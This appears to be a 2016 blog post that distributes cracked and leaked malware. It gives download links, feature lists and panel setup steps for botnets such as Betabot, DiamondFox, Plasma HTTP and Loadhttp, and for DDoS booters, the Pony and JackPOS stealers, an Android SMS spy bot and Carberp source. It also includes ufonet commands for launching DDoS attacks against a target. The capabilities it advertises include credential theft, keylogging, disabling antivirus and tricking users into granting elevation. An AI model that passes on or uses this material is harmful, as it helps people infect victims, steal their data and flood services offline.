Wednesday, 17 February 2016

Gaudox v1.1.0.0 - HTTP bot | C & ASM, 36kb











- Ring3 Rootkit
Includes rootkit functionality that hides all of its components from the explorer process.
The rootkit also prevents the bot from being removed from the system, and it is not implemented as a separate file, so the bot will not write any file to the hard disk.
This feature currently works only on 32-bit versions (XP-8.1).

- Persistence/Watchdog
This prevents the bot from being removed from the system by ensuring that its process is always running.
This feature is most compatible when the bot runs with administrator privileges.

- Traffic encrypted
The communication between the bot and the web panel is now encrypted.

- Web panel recoded
The panel has been completely recoded using PDO, which makes it safer by preventing SQL injection and other attacks.



How to install:
1) Open the builder and create a new profile; you will use its Key1 and Key2 values in the panel.
2) Create a database.
3) Open setup.php.
4) After installing, go to login.php and delete setup.php.
5) When creating the bot clients, do not forget to use the same profile you used to install the panel; otherwise the bots will not connect to the panel.


Download : https://mega.nz/#!2QMjmBYL!OG0uazcKEIIcGTeY3JJdI_L__EAkxKKpsWmhsSosUB8

SmsBot Android Botnet




Features:
- Grabbing all information about the victim (Phone Number, ICCID, IMEI, IMSI, Model, OS)
- Interception of incoming SMS messages and sending them to the web-panel and the control room.
- Call forwarding to any number
- Grabbing all incoming and outgoing SMS
- Grabbing all incoming and outgoing calls
- Record audio, sending it to the server (know what is happening around)
- Sending SMS to any room without the owner's knowledge

The APK works, but the panel seems to have some problems. Bots are not shown.
The infected phone connects to the panel correctly; I know this because two folders named with the IMEI number of the infected phone are created (in /sound and /listing), but there is nothing inside these folders and nothing inside the database...
Maybe someone here can get it working.

Let me know if you need help decompiling the APK, changing the host, etc., and then recompiling it.

Note: On the first line of each PHP file of the admin panel, change '<?' to '<?php', otherwise it will not work (on many hosts, XAMPP included).

Download : https://mega.nz/#!GZkzXbDK!Mcla-lIb-FbfNpd5ujiOAS9HHPW6aNNAsIA4eVhl0Yc

Friday, 5 February 2016

JackPOS Stealer




Download https://mega.nz/#!jN0SHBQZ!JH_FgAWNkMe9nfNcl4GRNZujZc3IUOhi1w80An0iGUI

Most Security Booter





Download https://mega.nz/#!GEU3TbLK!9SLo-z-JeJp3VRbPrHEsj5eprdj3GElGmh5DwcNjT04

FloristBooter 3.3


Feature:

[~] Added a Skype Resolver to the Resolve page
[~] Added option to add your own shells to increase your boot power.
[~] A counter checks how many shells you have added. Does not check if the shells are working yet
[~] Improved the design of the booter (No random buttons everywhere)
[~] Fixed the Geolocate system to make it simple
[~] Made the general feel sleeker and less clunky.
[~] Slight changes to the status page
[~] Increased the power quite significantly.
[~] Removed some minor features I felt didn't have a place.

Virus Scan Report:
https://www.virustotal.com/file/86430beda747b2bc9ce5679f656c51bda962dd3454b1a6a3d797eb7105277da8/analysis/


Download https://mega.nz/#!PJkH1bqQ!pNvLoD2U2KZZW7iTDEct9AeNT77s7A58TvU7kIozISs

Shrek Booter | Shell / API Booter | Many Layers



Download https://mega.nz/#!GM1m1brI!JIPKvAwrEkm74tufYHce1KViGAbqw2-u4UNI_0cA_Ts

Orion HTTP Booter

Features:
- Unique HTTP flooding technique
- Hits down most privately hosted webservers
- Nice GUI
- Saves URLs
- Customizable time limit
- Customizable thread limit
- Updated frequently


Download https://mega.nz/#!vBlDzSYL!5DJQZvzRYiFrihPHugfezPZ8YQ7WIZbzozRvaztNd6I

Source Carberp



Download https://mega.nz/#!qZdBFD7L!MQ976n4OVHVwWKoHRDp4-WiJHJkf5HzKWXyMLTWTWiA

source Vision Bot

Vision Bot 


Download https://mega.nz/#!TUl2QZjI!Ubu06lVWJ0Q06LOeHEGXdiS_d7QOSCvdlF40mRbG0Bs

Spy-1218 [ web rar ]

Install:
1. Import the DB into MySQL
2. Edit config.php
3. Edit $password in admin/check.php
4. Log in to admin

Download https://mega.nz/#!GBlj3RQJ!ZxqKww2q50bYrHe4qgZ_etu8XXW95A-QeDPRh1vInlc


Blackout Botnet V2

1. Upload all files in this folder to the path of your BlackOut botpanel.
2. Set CHMOD 777 for the file ip.php (file permission).

Visit FREETROJANBOTNET.COM for more information

0a34e53ca751de62bc16da2c0812440e  Builder.exe
f98a46d0d6b6a386e1920cabeef3f7d9  AxInterop.WMPLib.dll
55ec056cfeaced0e213961149d766d01  Interop.WMPLib.dll
Upload panel to your server
Upload online stats plugin
Create DB using blackout.sql
Set correct settings
Crypt your bot

Download https://mega.nz/#!XVtXHIBC!7GaHzmUbJLHJKUsrHL--7BtxWAoFhPlm32gxwMe6USw

Gorynch / DiamondFox Cracked Builder + Panel

- Bot update release date: June 18th 2015
- Cracked date: June 23rd 2015
- Bot Update log ver: 4.2.0.302
- Protection: VMProtect
- Builder language: VB6 P-Code
- MD5: BD0BB7537EA45B477B0F8E1B400003BF
Credits: ToW / The old Warrior

Functions:
Download and execute (in memory)
Download and execute (on disk)
Open website (Visible)
Open website (Hidden)
UDP Flood
HTTP Flood
Enable / Disable Host Editor
Enable / Disable PoS Grabber
Spam with bots (inbox)
Bitcoin Wallet Stealer
Facebook / Twitter Message spread
Firefox homepage changer
Enable / Disable Keylogger
Take screenshot
Password Grabber (Chrome, Firefox, Opera, IExplore, Safari)
FTP Grabber (Filezilla)
Instant Messaging Password Grabber
Grab EMAIL, SMTP, POP3 and IMAP
Update bot
Uninstall

Builder Options:
Fallback panel.
Custom Connection time.
Encrypted connections.
Encrypted data inside the bot.
Custom User-agent.
Anti-SysAnalyzer.
Anti-VirtualBox.
Anti-VMWare.
Anti-Anubis.
Anti-OllyDBG.
Disable Regedit.
Anti-Sandboxie.
Anti-Norman.
Anti-Researchers.
Anti-Malwr.com.
Anti-Wine.
Disable Taskmanager.
USB Spread.
Spread Dropbox.
File Extension Selector
User Account Control Forcer.
Custom install name
Custom install path
HKCU startup method
Winlogon startup method
Startup folder method
Optional melt function
Startup persistence
Automatic keylogger installation
Automatic Point-Of-Sales grabber installation
Automatic grabbers routine

Extra Info:
Very stable connection.
Random Access Memory plugins execution
Works with any crypter.
Lite Ring3 RootKit (Hide registry keys).
No dependencies needed.
Detect IP, country, antivirus, firewall, cpu, gpu, ram, memory, disk, user, PC name, hwid, software architecture and status.
Ability to send individual commands for each bot.
Ability to select the bots by country, status, by type or all.
Statistics. (Map, reports, status, operating system, host status, keylogger status, PoS status, System Architecture, antivirus and firewall)
Real-time Connection Notifications.
Communication between the bot and the panel is encrypted.
Spam is made for bots, not by the webpanel.
Based on plugins so more features will be added in the future.
Working on all OS. (XP, vista, 7, 8, 8.1) (We are starting support for Windows X)


Download https://mega.nz/#!yYkX1TJQ!Dd3FxBmjXdB6TVpnDw4s0kr2n3Bgxuzusw0dVx7Rrjo

ufonet v0.5 b

UFONet is a tool designed to launch DDoS attacks against a target, using ‘Open Redirect’ vectors on third-party web applications, like a botnet.

Features :
– Auto-update
– Clean code (only needs python-pycurl)
– Documentation with examples
– Web/GUI Interface
– Proxy to connect to ‘zombies’ (ex: tor)
– Change HTTP Headers (User-Agent, Referer, Host…)
– Configure requests (Timeout, Retries, Delay…)
– Search for ‘zombies’ on google results (using a pattern or a list of dorks)
– Test ‘Open Redirect’ vulnerabilities on ‘zombies’
– Download/Upload ‘zombies’ from Community
– Inspect a target (HTML objects sizes)
– Set a place to ‘bit’ on a target (ex: big file)
– Control number of rounds to attack
– Apply cache evasion techniques


Installing:
UFONet runs on many platforms. It requires Python and the following library:
— python-pycurl – Python bindings to libcurl
On Debian-based systems (ex: Ubuntu), run:
— sudo apt-get install python-pycurl
Source libs: Python | PyCurl

Attacking a target:
Enter a target to attack, with the number of rounds that will be attacked:
./ufonet -a http://target.com -r 10
This will attack the target with the list of ‘zombies’ that you provided in “zombies.txt”, 10 times for each ‘zombie’. That means that if you have a list of 1.000 ‘zombies’, the program will launch 1.000 ‘zombies’ x 10 rounds = 10.000 ‘hits’ to the target.
::By default, if you don’t put any round, it will apply only 1. ::
Additionally, you can choose a place to recharge on target’s site. For example, a large image, a big size file or a flash movie. In some scenarios where targets don’t use cache systems, this will make the attack more effective.

Testing botnet:
Open ‘zombies.txt’ (or another file) and create a list of possible ‘zombies’. URLs of the ‘zombies’ should be like this: http://target.com/check?uri=
After that, launch it:
./ufonet -t zombies.txt
At the end of the process, you will be asked if you want to update the list, automatically adding only ‘vulnerable’ web apps.
Wanna update your list (Y/n)
If you reply ‘Y’, your file zombies.txt will be updated.


Download https://mega.nz/#!6MMjHQLY!-R7K7uZGx1nRMnw2e_DIBLQuZrWNb0wVGQkeCilST1k

Loadhttp Botnet

Bot Feature List:

HTTP bot (communication encrypted using a modified standard encryption algorithm and use of static and dynamic passed around keys)
Coded in C++ (no dependencies other than Windows, no use of CRT, supports unicode/all language characters)
DNS resolving bypasses HOSTS file
Safemode startup ability
Startup with elevation retention (starts up with previously obtained elevated rights)
User-mode rootkit
Persistence and protection of registry key, file, and process
Hides file and startup also not visible in msconfig
Anti-Virus killer (supports 31 security solutions covering 95%+ of the AV market)
Anti-Malware/Botkiller (disables or kills the majority of all malware, even those notorious for being extremely resistant to tampering. Scans heuristically)
Privilege escalation through social engineering
Visit website visible or hidden
Execute shell command visible or hidden
Download & Update (options to confirm with MD5 hash, execute file with commandline arguments, save to specific location)
Uninstallation (gets rid of startup, installed file/directory, executed file, registry keys that hold bot data, and optionally scans the entire system for any file that matches the MD5 of the currently executed file for deletion)
Disable system restore and delete any old restoration points
Disable Windows Firewall
Disable Windows Update
Detection of shutdown and logoff
Preventing of going into stand-by mode
Support for unlimited domains in configuration
Change homepages on Internet Explorer, Mozilla Firefox, and Google Chrome
Whenever files are deleted by the bot, the memory is freed (safe-delete, a.k.a. data is unrecoverable)
Command & Control Panel is secure from any web-hacking and query injections. Supports multi-user management
Proactive AV settings bypasses
CloudFlare support in the Control Panel
~44kb file size
Handling of own Zone.Identifier stream without dampening of optimal internet settings as some other bots do
Additional process persistence via injected watchdog threads
Ability to send a list of download links and have the links be randomly chosen for download or update


Control Panel Feature List:

Captcha on login page prevents any bruteforce attack attempts
Control Panel endured a security audit done by a team of experienced web-vulnerability professionals, you are guaranteed to be hack-safe
Highly detailed information and statistics displayed and stored about your bot network
Detailed displayed commands
Highly modifiable commands: you can pause, restart, and delete commands. You can modify command filters extensively.
Password changing ability
Ability to optionally use a loginpage-URL-key to prevent and discourage panel sniffing attempts
Modifiable bot communication settings
User management page has broad functionality for adding and removing other users, controlling user privileges and seeing how active they have been
There is a page for conveniently viewing the foreground window activity of bots
The control panel is compatible with all recent versions of PHP and MySQL

Panel Setup:
------------
1) Upload all of the files to a webserver at the correct path.
2) Create a MySQL database and note the host, username, password, and db name.
3) In phpmyadmin, navigate to "Import" and select DATABASE.sql from this directory, then upload it.
4) Open up the file CONFIGURATION.php. Input your database credentials and encryption key.
    (You should have been provided with the encryption key)
5) Navigate to the /login/ page and log in with the credentials Admin:change_me
6) Once in the panel, go to the Preferences page and change your password.
7) Use the login page key feature available in Preferences for your security as well.
    (You visit your login page like: http://panel.net/path/login/?key=1234)
8) You should be able to administer bots and control them through commands now.
9) Now that panel setup is complete, delete or move this file and DATABASE.sql from the webserver.
    (This is important)


Download https://mega.nz/#!SV91EYRa!FAEdWqKRHrlfIbQWzAJA-nCSNPGh6lVGCKNYP416IMQ

Pony 2.0 Builder + src

+++++++LATEST PONY STEALER/LOADER+++++++

+HTTP GRABBER (GOOGLE CHROME , FIREFOX ETC)
+HTTPS
+FTP (ALL LATEST POPULAR CLIENTS)
+BITCOINS WALLET GRABBER(OPTIONAL)
+POP3, SMTP , ALL LATEST CLIENTS GRABBER(EMAILS CLIENT SPECIALLY CHINA)
"PONY 2015"



Download https://mega.nz/#!OY0x2bRY!e-rQvHMLoSI13LKEHwiONFrXpZiWd6e8rU1TeUe1GZY

PlasmaHTTP Botnet + Complete Bin

Plasma HTTP is an improved variant of the well-known Athena HTTP, which attacked only Windows XP; this variant attacks all versions of Windows. It can steal the passwords saved in the Google Chrome browser and can even steal the passwords stored in FileZilla FTP. This botnet has a high infection rate and has the option of sending the attacker all the information about the victim PC, and it can disable several Windows software applications. The attacker can send commands to the infected machine, with support for five highly dangerous commands:
 
" DDoS Commands "
- Slowloris
- UDP
- Arme
- HTTP Post
- HTTP Get
- Condis
- BwFlood
- Stop DDos
" Miner Commands "
- CPU
- GPU
" Bot Commands "
- Download
- Update
- Uninstall
- Update Gate
" Botkiller Commands "
- Run Bot Killer Module
- Run Hard Bot Killer Module
- Enable Proactive Bot Killer
- Disable Proactive Bot Killer
" Misc Commands "
- Hosts
- Shell
- Visit Hidden
- Visit Visible
- Torrent Seeder


Download https://mega.nz/#!rFkDCTrb!W7E693661rd8lmVbF5NUQtJv6AmHiUjX5h4OmUV7xUc

Betabot 1.7.0.1 Panel & Builder Cracked by duyan13

  • Form Grabber
    When specified sites are detected, Betabot will pull any relevant forms as they are sent, and export details to the main panel. In order for the Form Grabber to work, you must specify filters on the panel. When creating filters, the use of wildcards (*) is supported.
    • FireFox (Normal and SSL)
    • Internet Explorer (Normal and SSL)
    • Google Chrome (Normal and SSL)
  • x86/64 Userkit
    Userland rootkit for both 32 bit and 64 bit systems allows the bot to remain untouchable to other bots and basic user interference. Innovative technique for intercepting system calls on x86 systems allows for better compatibility with other bots. All hooks made will be restored if removed and general unhooker removes 3rd party hooks on sensitive NT service stubs.
  • AntiVirus Disabler
    Using multiple removal methods, Betabot is able to remove or disable over 30 different Anti Viruses from user mode. On Vista and 7, elevation is required for this function to work properly. To help achieve maximum efficiency, a custom social engineering tactic (written in 12 languages) is used to trick the user into elevating the bot process. This method has proven to be roughly 70% - 80% effective when attempting to elevate privileges.
     
     
    • Ahnlab v3 Lite (XP only)
    • ArcaVir
    • Avast!
    • AVG
    • Avira
    • BitDefender (On minimal config)
    • BKAV
    • BullGuard
    • Emsisoft Anti-Malware
    • ESET NOD32 / Smart Security
    • F-PROT
    • F-Secure IS
    • GData IS
    • Ikarus AV
    • K7 AntiVirus
    • Kaspersky AV/IS (Older versions only)
    • Lavasoft Adaware AV
    • MalwareBytes Anti-Malware
    • McAfee
    • Microsoft Security Essentials
    • Norman AntiVirus
    • Norton AntiVirus (Vista+ only)
    • Outpost Firewall Pro
    • Panda AV/IS
    • Panda Cloud AV (Free version)
    • PC Tools AntiVirus
    • Rising AV/IS
    • Sophos Endpoint AntiVirus
    • Total Defense
    • Trend Micro
    • Vipre
    • Webroot SecureAnywhere AV
    • Windows Defender
    • ZoneAlarm IS
  • Anti-Malware (Botkiller)
    Complex heuristic-based anti-malware component allows for thorough removal of not only major/common malware used in PPI ventures and more. Suspicious autostart items, files, processes and injected code will be removed/disabled when possible. Special options to target BTC/LTC miners is available.
  • DNS Blocker/Redirector
    The domain name modifier allows domains to be forced to resolve to any IP provided, or flat out blocked. All popular browsers/desktop applications supported.
  • Live FTP/POP3 grabber
    Network data interception allows FTP and POP3 logins over non-SSL connections to be intercepted and recorded in real time. Additionally, SSH logins made from PuTTY client are recorded and reported to the server.
  • File Search
    Ability to search all files on local hard disks for certain terms or files with certain names/extensions. Additionally, directories can be excluded from the search. Files matching search parameters will be uploaded to the C2 server.
  • Proactive Defense Mode
    Special self-defense mode that can be toggled on and off. When turned on, this will block most known methods of code injection and other malware-related activity to ensure only betabot is in control.
  • General bot defense
    Using a myriad of different concepts, betabot protects itself from removal/tampering. Areas of protection include process, autostart and file protection. Betabot is highly resistant to code injection, file removal and unhooking.
  • Additional features:
    • File Size < 150kb
    • Config Editor to edit builds -- Change group names
    • Block Bootkit Installation of some Bootkits (Mainly Rovnix(Carberp)). Can be toggled on/off from the panel.
    • Multi Server Support for up to 16 different servers. Different configurations are possible for each individual server.
    • Four different DDoS methods. Various settings to change. Uses local information to attempt to randomize headers in HTTP Floods.
         UDP
         Rapid Connect/Disconnect
         HTTP GET
         Slowloris
    • Experimental Ruskill - Using an active Sandbox-like, Betabot will attempt to sequester specified programs and roll back any changes made by them after Running. This feature is currently in development and may not work on some bots.
    • USB Autorun - When enabled, Betabot will add itself to any USB drive inserted into the machine using LNK-File swap techniques.
    • SOCKS4 Server - Turn your bots into dedicated SOCKS4 proxies. You may set the port as well as the duration. Supports UPnP.
    • FTP Stealer harvests live FTP logins as they happen in real time.
    • Anti Virus Checker allows you to enter your Scan4You account info into the panel and makes use of the S4Y API for quick and easy scanning, straight from your own panel.
    • Various Rudimentary Antis - To help maintain the integrity of Beta Bot and to protect various pieces of vital code, Beta Bot makes use of multiple anti debugging and anti dumping methods.
    • Download / Update / Uninstall / etc - Basic commands expected of all bots. Supports DLLs and JAR files.
    • Additional User Accounts - Ability to create additional user accounts to access your panel. Fully customizable access levels.
    • Advanced Search Options to locate specific bots quickly and easily.
Download https://mega.nz/#!6c0SUbpY!Q9oUTcuFuEcwHsl9JH8xQVexlOMOluZ3y4XynPD5mys